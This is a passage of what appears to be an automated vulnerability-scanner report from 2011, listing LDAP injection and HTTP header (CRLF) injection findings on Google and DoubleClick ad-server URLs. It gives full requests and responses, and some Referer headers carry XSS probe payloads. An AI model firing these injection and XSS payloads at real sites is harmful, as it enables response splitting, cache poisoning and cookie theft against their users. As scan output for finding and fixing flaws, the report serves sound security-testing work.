       persiststate: false, //Remember last content shown within browser session (true/false)?
       speed: 500, //Glide animation duration (in milliseconds)
       autorotate: true, //Auto rotate contents (true/false)?
       autorotateconfig: [5000
...[SNIP]...

2.7. http://www.google.com/uds/GnewsSearch [sig parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.google.com
Path:   /uds/GnewsSearch

Issue detail

The sig parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the sig parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /uds/GnewsSearch?callback=google.search.NewsSearch.RawCompletion&context=0&rsz=small&hl=en&gss=.com&sig=*)(sn=*&q=rick%20santorum&key=internal-zeitgeist&v=1.0&nocache=1305033071811 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=rick+santorum&date=2011-5-10&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=aQQFw_m5MgodDdHJ1xVbKTCbuualenKfe8EiKcwMEGKFPqWsF0-4XtTZsPXY9cXQIj1W8o_Jqj5uAaJQPmNYlIVf6mB-ckZkZlODBxKm5uH1Nl9YbBSq68wtGrbU0m5F

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Tue, 10 May 2011 13:15:33 GMT
Content-Type: text/javascript; charset=utf-8
X-Backend-Content-Length: 13035
X-Embedded-Status: 200
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 11626

google.search.NewsSearch.RawCompletion('0', {"results":[{"GsearchResultClass":"GnewsSearch","clusterUrl":"http://news.google.com/news/story?ncl\u003ddVOF1zm7u7feiNMJWLE_5O7d-AFxM\u0026hl\u003den\u0026
...[SNIP]...
u003dT\u0026ct\u003dus/0-0-0\u0026fd\u003dS\u0026url\u003dhttp://www.historiccity.com/2011/staugustine/news/florida/lincoln-reagan-day-celebrated-weeks-14454\u0026cid\u003d17593892923622\u0026ei\u003ddTrJTYi4JJvo4AGThey6AQ\u0026usg\u003dAFQjCNFV2Bm3BmsZcnlXnv_dmgR2jN6jSQ","language":"en","image":{"url":"http://static.guim.co.uk/sys-images/Guardian/Pix/red/blue_pics/2011/05/09/hermancain_460x276.jpg","tbUrl":"http://nt2.ggpht.com/news/tbn/QmqXc78UCr4J","originalContextUrl":"http://www.guardian.co.uk/commentisfree/cifamerica/2011/may/09/herman-cain-republicans-2012","publisher":"The Guardian","tbWidth":80,"tbHeight":48},"relatedStories":[{"unescapedUrl":"http://www.catholic.org/politics/story.php?id\u003d41352","url":"http%3A%2F%2Fwww.catholic.org%2Fpolitics%2Fstory.php%3Fid%3D41352","title":"Campaign 2012, South Carolina, \u003cb\u003eRick Santorum\u003c/b\u003e and the Kentucky Derby","titleNoFormatting":"Campaign 2012, South Carolina, Rick Santorum and the Kentucky Derby","location":"","publisher":"Catholic Online","publishedDate":"Mon, 09 May 2011 13:38:24 -0700","signedRedirectUrl":"http://news.google.com/news/url?sa\u003dT\u0026ct\u003dus/0-0-1\u0026fd\u003dS\u0026url\u003dhttp://www.catholic.org/politics/story.php%3Fid%3D41352\u0026cid\u003d17593892923622\u0026ei\u003ddTrJTYi4JJvo4AGThey6AQ\u0026usg\u003dAFQjCNG-asSc3MItQHzEeDxo3X8rt2C9mw","language":"en"},{"unescapedUrl":"http://www.philly.com/philly/news/nation_world/121548659.html","url":"http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html","title":"\u003cb\u003eSantorum\u003c/b\u003e goes to dinner and comes up with a win | Philadelphia Inquirer | 2011 \u003cb\u003e...\u003c/b\u003e","titleNoFormatting":"Santorum goes to dinner and comes up with a win | Philadelphia Inquirer | 2011 ...","location":"","publisher":"Philadelphia Inquirer","publishedDate":"Tue, 10 May 2011 00:15:50 
-0700","signedRedirectUrl":"http://news.google.com/news/url?sa\u003dT\u0026ct\u003dus/0-0-2\u0026fd\u003dS\u0026url\u003dhttp://www.philly.com/philly/news/nation_world/121548659.html\u0026cid\u003d17593892923622\u0026ei\u003ddTrJTYi4JJvo4AGThey6AQ\u0026usg\u003dAFQjCNEW5awmdDbyS5K44e7qFQU5sKhDOg","language"
...[SNIP]...

Request 2

GET /uds/GnewsSearch?callback=google.search.NewsSearch.RawCompletion&context=0&rsz=small&hl=en&gss=.com&sig=*)!(sn=*&q=rick%20santorum&key=internal-zeitgeist&v=1.0&nocache=1305033071811 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=rick+santorum&date=2011-5-10&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:FF=0:TM=1303071569:LM=1304695017:GM=1:S=TtNIJs_fkMoJMWwR; NID=46=aQQFw_m5MgodDdHJ1xVbKTCbuualenKfe8EiKcwMEGKFPqWsF0-4XtTZsPXY9cXQIj1W8o_Jqj5uAaJQPmNYlIVf6mB-ckZkZlODBxKm5uH1Nl9YbBSq68wtGrbU0m5F

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Tue, 10 May 2011 13:15:34 GMT
Content-Type: text/javascript; charset=utf-8
X-Backend-Content-Length: 13110
X-Embedded-Status: 200
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 11604

google.search.NewsSearch.RawCompletion('0', {"results":[{"GsearchResultClass":"GnewsSearch","clusterUrl":"http://news.google.com/news/story?ncl\u003ddVOF1zm7u7feiNMJWLE_5O7d-AFxM\u0026hl\u003den\u0026
...[SNIP]...
u003dT\u0026ct\u003dus/0-0-0\u0026fd\u003dS\u0026url\u003dhttp://www.historiccity.com/2011/staugustine/news/florida/lincoln-reagan-day-celebrated-weeks-14454\u0026cid\u003d17593892923622\u0026ei\u003ddjrJTZDQKYiy4QHS3JEW\u0026usg\u003dAFQjCNFIG_eEZ63WAnuMui53lyPy6cVBDQ","language":"en","image":{"url":"http://static.guim.co.uk/sys-images/Guardian/Pix/red/blue_pics/2011/05/09/hermancain_460x276.jpg","tbUrl":"http://nt2.ggpht.com/news/tbn/QmqXc78UCr4J","originalContextUrl":"http://www.guardian.co.uk/commentisfree/cifamerica/2011/may/09/herman-cain-republicans-2012","publisher":"The Guardian","tbWidth":80,"tbHeight":48},"relatedStories":[{"unescapedUrl":"http://www.catholic.org/politics/story.php?id\u003d41352","url":"http%3A%2F%2Fwww.catholic.org%2Fpolitics%2Fstory.php%3Fid%3D41352","title":"Campaign 2012, South Carolina, \u003cb\u003eRick Santorum\u003c/b\u003e and the Kentucky Derby","titleNoFormatting":"Campaign 2012, South Carolina, Rick Santorum and the Kentucky Derby","location":"","publisher":"Catholic Online","publishedDate":"Mon, 09 May 2011 13:38:24 -0700","signedRedirectUrl":"http://news.google.com/news/url?sa\u003dT\u0026ct\u003dus/0-0-1\u0026fd\u003dS\u0026url\u003dhttp://www.catholic.org/politics/story.php%3Fid%3D41352\u0026cid\u003d17593892923622\u0026ei\u003ddjrJTZDQKYiy4QHS3JEW\u0026usg\u003dAFQjCNGNswtTd2d6H0pwA9rr9BlmH0BE1Q","language":"en"},{"unescapedUrl":"http://www.philly.com/philly/news/nation_world/121548659.html","url":"http%3A%2F%2Fwww.philly.com%2Fphilly%2Fnews%2Fnation_world%2F121548659.html","title":"\u003cb\u003eSantorum\u003c/b\u003e goes to dinner and comes up with a win | Philadelphia Inquirer | 2011 \u003cb\u003e...\u003c/b\u003e","titleNoFormatting":"Santorum goes to dinner and comes up with a win | Philadelphia Inquirer | 2011 ...","location":"","publisher":"Philadelphia Inquirer","publishedDate":"Tue, 10 May 2011 00:15:50 
-0700","signedRedirectUrl":"http://news.google.com/news/url?sa\u003dT\u0026ct\u003dus/0-0-2\u0026fd\u003dS\u0026url\u003dhttp://www.philly.com/philly/news/nation_world/121548659.html\u0026cid\u003d17593892923622\u0026ei\u003ddjrJTZDQKYiy4QHS3JEW\u0026usg\u003dAFQjCNEJXRApr4I_c9dhmt09Y2chtzWirg","language":"en"}
...[SNIP]...

3. HTTP header injection
There are 48 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/N6496/adj/gather.com/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /N6496/adj/gather.com/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 53a62%0d%0a763681015b6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /53a62%0d%0a763681015b6/adj/gather.com/;tile=1;sz=728x90;ord=9449814500592618;qcseg=D;? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/53a62
763681015b6
/adj/gather.com/;tile=1;sz=728x90;ord=9449814500592618;qcseg=D;:
Date: Tue, 10 May 2011 14:11:31 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://ad.doubleclick.net/N6496/adj/gather.com/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /N6496/adj/gather.com/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 44005%0d%0a76d46cccbc5 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /N6496/44005%0d%0a76d46cccbc5/gather.com/;groupname=politics;kw=politics,rick+santorum,debra+burlingame,bin+laden,obama,2012,eric+holder,cia,;adSense=yes;tile=4;sz=468x60;ord=699316430836916;qcseg=D;qcseg=T;qcseg=4078;qcseg=4077;qcseg=4076;qcseg=4075;qcseg=4072;qcseg=4071;qcseg=4067;? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/44005
76d46cccbc5
/gather.com/;groupname=politics;kw=politics,rick santorum,debra burlingame,bin laden,obama,2012,eric holder,cia,;adSense=yes;tile=4;sz=468x60;ord=699316430836916;qcseg=D;qcseg=T;qcseg=4078;qcseg=4077;qcseg=4076;qcseg=4075;qcseg=4072;qcseg=4071;qcseg=4067;:
Date: Tue, 10 May 2011 13:20:07 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.3. http://ad.doubleclick.net/ad/N3671.277003.NETSHELTER/B5398653.20 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3671.277003.NETSHELTER/B5398653.20

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c8a0%0d%0ac9145ac5983 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c8a0%0d%0ac9145ac5983/N3671.277003.NETSHELTER/B5398653.20;sz=1x1;pc=[TPAS_ID];ord=[timestamp]?882012667832896100 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.knowyourmobile.com/features/881740/google_io_what_to_expect.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c8a0
c9145ac5983
/N3671.277003.NETSHELTER/B5398653.20;sz=1x1;pc=[TPAS_ID];ord=[timestamp]:
Date: Tue, 10 May 2011 13:48:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.4. http://ad.doubleclick.net/ad/N4478.netshelter.netOX2611/B5176383.13 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N4478.netshelter.netOX2611/B5176383.13

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8b32f%0d%0a53cbf34ed88 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8b32f%0d%0a53cbf34ed88/N4478.netshelter.netOX2611/B5176383.13;sz=1x1;pc=[TPAS_ID];ord=1305033278925? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.slashgear.com/samsung-galaxy-tab-10-1-hands-on-at-google-io-2011-09151027/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8b32f
53cbf34ed88
/N4478.netshelter.netOX2611/B5176383.13;sz=1x1;pc=[TPAS_ID];ord=1305033278925:
Date: Tue, 10 May 2011 13:38:52 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.5. http://ad.doubleclick.net/ad/N5371.131643.MEEBO.COM/B5369958.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N5371.131643.MEEBO.COM/B5369958.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1fe5f%0d%0a152986ec65b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1fe5f%0d%0a152986ec65b/N5371.131643.MEEBO.COM/B5369958.2;sz=1x1;ord=4683596 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=philly
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1fe5f
152986ec65b
/N5371.131643.MEEBO.COM/B5369958.2;sz=1x1;ord=4683596:
Date: Tue, 10 May 2011 13:14:03 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.6. http://ad.doubleclick.net/ad/huffpost.boomerangpixel/bingmodule [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/huffpost.boomerangpixel/bingmodule

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied unfiltered into the Location response header. The payload 7aaba%0d%0a387e7ad2d0a was submitted in REST URL parameter 1; its %0d%0a decodes to a CRLF, so in the response below the Location header ends after 7aaba and 387e7ad2d0a begins a new header line. This caused a response containing an injected HTTP header.

Request

GET /7aaba%0d%0a387e7ad2d0a/huffpost.boomerangpixel/bingmodule;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;south-carolina-primary-election=1;south-carolina-straw-poll=1;south-carolina-straw-poll-2011=1;south-carolina-straw-poll-results=1;global=1;load_mode=inline;page_type=bpage;pos=boomerang;u=1x1%7Cbpage%7Cboomerang%7C2012-election,@mostpopular,rick-santorum,elections-2012,rick-santorum-for-president,santorum-for-president,rick-santorum-2012,rick-santorum-south-carolina-straw-poll,santorum-2012,south-carolina-primary-election,south-carolina-straw-poll,south-carolina-straw-poll-2011,south-carolina-straw-poll-results%7C%7C%7C%7C859012%7C%7C%7C%7C;dcove=r;sz=1x1;tile=4;ord=1545223310? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/07/rick-santorum-south-carolina-straw-poll_n_859012.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7aaba
387e7ad2d0a
/huffpost.boomerangpixel/bingmodule;featured-posts=1;politics=1;;entry_id=859012;2012-election=1;@mostpopular=1;rick-santorum=1;elections-2012=1;rick-santorum-for-president=1;santorum-for-president=1;rick-santorum-2012=1;rick-santorum-south-carolina-straw-poll=1;santorum-2012=1;so:
Date: Tue, 10 May 2011 13:20:27 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.7. http://ad.doubleclick.net/ad/q1.philly/news [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/q1.philly/news

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied unfiltered into the Location response header. The payload 39ce7%0d%0a2f52260dc9e was submitted in REST URL parameter 1; its %0d%0a decodes to a CRLF, so in the response below the Location header ends after 39ce7 and 2f52260dc9e begins a new header line. This caused a response containing an injected HTTP header.

Request

GET /39ce7%0d%0a2f52260dc9e/q1.philly/news;net=q1;u=,q1-5225770_1305037198,11fda490648f83c,none,q1.polit_h-q1.none_l;;sz=728x90;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_l;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/39ce7
2f52260dc9e
/q1.philly/news;net=q1;u=,q1-5225770_1305037198,11fda490648f83c,none,q1.polit_h-q1.none_l;;sz=728x90;contx=none;dc=w;btg=q1.polit_h;btg=q1.none_l;ord=[timestamp]:
Date: Tue, 10 May 2011 14:22:22 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.8. http://ad.doubleclick.net/adi/N1558.CasaleMedia/B4461671.2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.CasaleMedia/B4461671.2

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied unfiltered into the Location response header. The payload 6b9f3%0d%0a081c9994bcf was submitted in REST URL parameter 1; its %0d%0a decodes to a CRLF, so in the response below the Location header ends after 6b9f3 and 081c9994bcf begins a new header line. This caused a response containing an injected HTTP header.

Request

GET /6b9f3%0d%0a081c9994bcf/N1558.CasaleMedia/B4461671.2;sz=300x250;click0=http://c.casalemedia.com/c/4/1/81668/;ord=0623409108 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?b707f%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E27da8a889a7=1
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6b9f3
081c9994bcf
/N1558.CasaleMedia/B4461671.2;sz=300x250;click0=http: //c.casalemedia.com/c/4/1/81668/;ord=0623409108
Date: Tue, 10 May 2011 14:32:26 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.9. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.casalemedia/B2343920.400

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied unfiltered into the Location response header. The payload 6a9ad%0d%0a035b77634f4 was submitted in REST URL parameter 1; its %0d%0a decodes to a CRLF, so in the response below the Location header ends after 6a9ad and 035b77634f4 begins a new header line. This caused a response containing an injected HTTP header.

Request

GET /6a9ad%0d%0a035b77634f4/N3285.casalemedia/B2343920.400;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80254/;ord=0619192936 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://letters.salon.com/politics/war_room/2011/05/09/santorum_loser/view/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6a9ad
035b77634f4
/N3285.casalemedia/B2343920.400;sz=728x90;click0=http: //c.casalemedia.com/c/2/1/80254/;ord=0619192936
Date: Tue, 10 May 2011 13:18:40 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.10. http://ad.doubleclick.net/adi/N4441.contextweb.com/B5238188.3 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4441.contextweb.com/B5238188.3

Issue detail

The value of REST URL parameter 1 (the first path segment) is copied unfiltered into the Location response header. The payload 156a8%0d%0aaaaf12c76d6 was submitted in REST URL parameter 1; its %0d%0a decodes to a CRLF, so in the response below the Location header ends after 156a8 and aaaf12c76d6 begins a new header line. This caused a response containing an injected HTTP header.

Request

GET /156a8%0d%0aaaaf12c76d6/N4441.contextweb.com/B5238188.3;sz=300x250;pc=55430;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~530930~3102~55430~118002~90494~3~0~0~gather.com~2~8~1~0~2~4~-v4tGUlNnOKLF2eVmcuAJa88_QclyMTM~4~2~J27ODOzR145A~RiC6i2pCL3Ub~1~0~1~~;ord=1715081945? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/6360d%3Cimg+src=a+onerror=alert(1)%3E1b6979d15ce
Cookie: id=c60bd0733000097||t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/156a8
aaaf12c76d6
/N4441.contextweb.com/B5238188.3;sz=300x250;pc=55430;click=http: //cdslog.contextweb.com/CDSLogger/L.aspx
Date: Tue, 10 May 2011 14:12:10 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.11. http://ad.doubleclick.net/adi/N6344.126328.SPECIFICMEDIA/B5358490.6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6344.126328.SPECIFICMEDIA/B5358490.6

Issue detail

